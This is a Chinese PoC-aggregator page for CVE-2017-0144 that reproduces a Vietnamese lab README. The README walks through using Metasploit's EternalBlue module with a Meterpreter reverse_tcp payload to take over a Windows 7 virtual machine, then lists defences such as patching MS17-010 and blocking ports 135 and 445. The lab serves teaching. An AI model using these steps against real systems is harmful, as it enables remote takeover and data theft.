漏洞平台

POC详情： 77a1a5aef648c5badf182479e4335acfa63326d9

来源

https://github.com/luckyman2907/SMB-Protocol-Vulnerability_CVE-2017-0144

关联漏洞

标题： Microsoft Windows SMB 输入验证错误漏洞 (CVE-2017-0144)
描述：Microsoft Windows和Microsoft Windows Server都是美国微软（Microsoft）公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block（SMB）Server是其中的一个为计算机提供身份验证用以访问服务器上打印机和文件系统的组件。 Microsoft Windows中的SMBv1服务器存在远程代码执行漏洞。远程攻击者可借助特制的数据包利用该

介绍

LAB: TẤN CÔNG HỆ ĐIỀU HÀNH WINDOWS DỰA VÀO LỖ HỔNG GIAO THỨC SMB.
- [1. MÔ TẢ](#1-mô-tả)
- [2. GIỚI THIỆU CHUNG](#2-giới-thiệu-chung)
- [3. CHUẨN BỊ](#3-chuẩn-bị)
- [4. THỰC HIỆN TẤN CÔNG](#4-thực-hiện-tấn-công)
- [5. CÁCH PHÒNG CHỐNG](#5-cách-phòng-chống)

## 1. MÔ TẢ

Trong bài lab ta sẽ sử dụng hai máy tính để mô phỏng một cuộc tấn công dựa vào lỗ hổng trong giao thức SMB của Hệ điều hành Windows. Một máy chạy Hệ điều hành Kali Linux, đóng vai trò kẻ tấn công (hacker). Và một máy tính đóng vai trò là máy nạn nhân (victim). Máy victim đang chạy Hệ điều hành Windows 7 64 bit có chứa lỗ hổng SMB. Để làm được điều này, trên máy Kali Linux ta sẽ sử dụng mã khai thác có tên là ***EternalBlue*** để tấn công vào máy Windows 7.

## 2. GIỚI THIỆU CHUNG

**Server Message Block** (SMB) là một giao thức chia sẻ file khá phổ biến trên nền tảng Windows của Microsoft. Nhờ vào giao thức SMB này mà các máy tính Windows kết nối với nhau trong cùng một lớp mạng hay trong cùng một Domain có thể chia sẻ file được với nhau. Cho đến nay, SMB còn có tên gọi khác là ***Common Internet File Sharing*** (CIFS).

**EternalBlue** là một mã khai thác thông tin, dựa vào lỗ hổng của giao thức SMB thông qua cổng 445. Ban đầu, **EternalBlue** được phát triển bởi *Cục An Ninh Quốc Gia Hoa Kỳ (NSA)*. Tên đầy đủ tiếng Anh là U.S. National Security Agency. Nhưng sau đó, nó bị rò rỉ bởi nhóm *Hacker The Shadow Brokens* vào năm 2017. Cũng trong cùng năm đó. Một đợt tấn công quy mô lớn của Virus mã hoá dữ liệu – Ransomware, nhằm vào các máy tính chạy Windows của Microsoft, diễn ra trên toàn thế giới. Trong đó, nổi tiếng nhất vẫn là virus **WannaCry** . Cho đến nay mặc dù lỗ hổng này đã được vá bởi Microsoft bằng bản cập nhật bảo mật ***MS17-010***. Tuy nhiên, trên thế giới một số lượng lớn máy tính đang chạy Hệ điều hành Windows vẫn còn tồn tại lỗ hổng này. Lỗ hổng này được công bố trong ***CVE-2017-0144***. (Windows SMB Remote Code Execution Vulnerability). Lỗ hổng này vô cùng nguy hiểm và rất dễ dàng bị khai thác. Điều đáng nói là để tấn công qua lỗ hổng giao thức SMB này. Hacker không cần phải gởi hay lừa cho nạn nhân tải về hoặc chạy bất kì một virus độc hại nào đó. Tức là nạn nhân cho dù không làm gì cả nhưng vẫn bị hacker dễ dàng tấn công chiếm quyền điều khiển máy tính mà không hề hay biết.

## 3. CHUẨN BỊ

Chuẩn bị 02 máy ảo chạy trên phần mềm VMware Workstation:

- Máy ảo Kali Linux (máy hacker) có địa chỉ IP là: 192.168.198.140
- Máy ảo Windows 7 (máy victim) có địa chỉ IP là: 192.168.198.143

![](./images/18-05-17.png)

1. **Trên máy ảo Kali(attack):**
   
   - Kiểm tra ip: `ifconfig`
   - Tiến hành khởi chạy dịch vụ *Postgresql*: `service postgresql start`
   - Kiểm tra postgresql đã chạy hay chưa ta dùng lệnh: `service postgresql status`

2. **Trên máy ảo Windows 7(victim):**
   
   - Kiểm tra ip : `ipconfig`
   - Tắt tường lửa (Firewall)
## 4. THỰC HIỆN TẤN CÔNG

- Trên máy Kali: Đăng nhập vào *Metasploit* bằng câu lệnh: `msfconsole`

![](./images/19-18-15.png)
- Khi đã vào được *Metasploit* ta tìm kiếm những lỗi cũng như các cú pháp liên quan đến **ms17_010** bằng lệnh:  `search ms17_010`

![](./images/19-20-54.png)
- Thêm địa chỉ IP máy victim,máy attack
- Thiết lập payload để khai thác: 
`use 0 -> set payload windows/x64/meterpreter/reverse_tcp`

![](./images/20-21-24.png)

- Chạy exploit để tiến hành khai thác
- Mở shell trên máy nạn nhân (thực hiện qua terminal máy attack) sau khi đã xâm nhập đc vào

![](./images/20-17-40.png)
  > =>Đến đây xem như hacker đã thành công xâm nhập vào máy victim. Lúc này, hacker có thể xoá, ăn cắp file từ máy nạn nhân mà họ không hề hay biết. Thậm chí, hacker có thể upload và chạy virus trực tiếp trên đó.

## 5. CÁCH PHÒNG CHỐNG

Để tránh bị khai thác và lợi dụng giao thức SMB. Ta cần thực hiện một số công việc sau:

- Kích hoạt tường lửa (Firewall).
- Cập nhật Windows lên bản mới nhất. Hoặc tải và cập nhập các bản vá bảo mật của Microsoft. Nhất là bản vá bảo mật ***ms17_010***.
- Chặn các port 135, 445.
  - `netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"`
  - `netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"`

文件快照


 [4.0K]  /data/pocs/77a1a5aef648c5badf182479e4335acfa63326d9
├── [4.0K]  images
│   ├── [ 57K]  18-05-17.png
│   ├── [232K]  19-18-15.png
│   ├── [390K]  19-20-54.png
│   ├── [331K]  20-17-40.png
│   └── [363K]  20-21-24.png
└── [5.3K]  README.md

1 directory, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。